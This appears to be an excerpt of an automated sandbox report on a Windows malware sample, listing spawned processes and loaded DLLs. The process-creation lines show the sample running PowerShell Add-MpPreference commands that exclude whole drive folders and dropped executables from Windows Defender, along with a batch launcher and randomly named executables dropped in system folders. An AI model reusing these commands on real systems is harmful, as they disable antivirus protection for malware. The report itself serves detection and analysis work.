                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KDhudFNWvk.bat"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD56.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCCB61929627DF440F9E17C549CE99168.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAFE6.tmp" "c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Program Files\Everything\Everything.exeProcess created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Program Files\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe.exe "C:\Program Files\Everything\Everything.exe.exe" -startup
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: ktmw32.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: dlnashext.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: wpdshext.dll
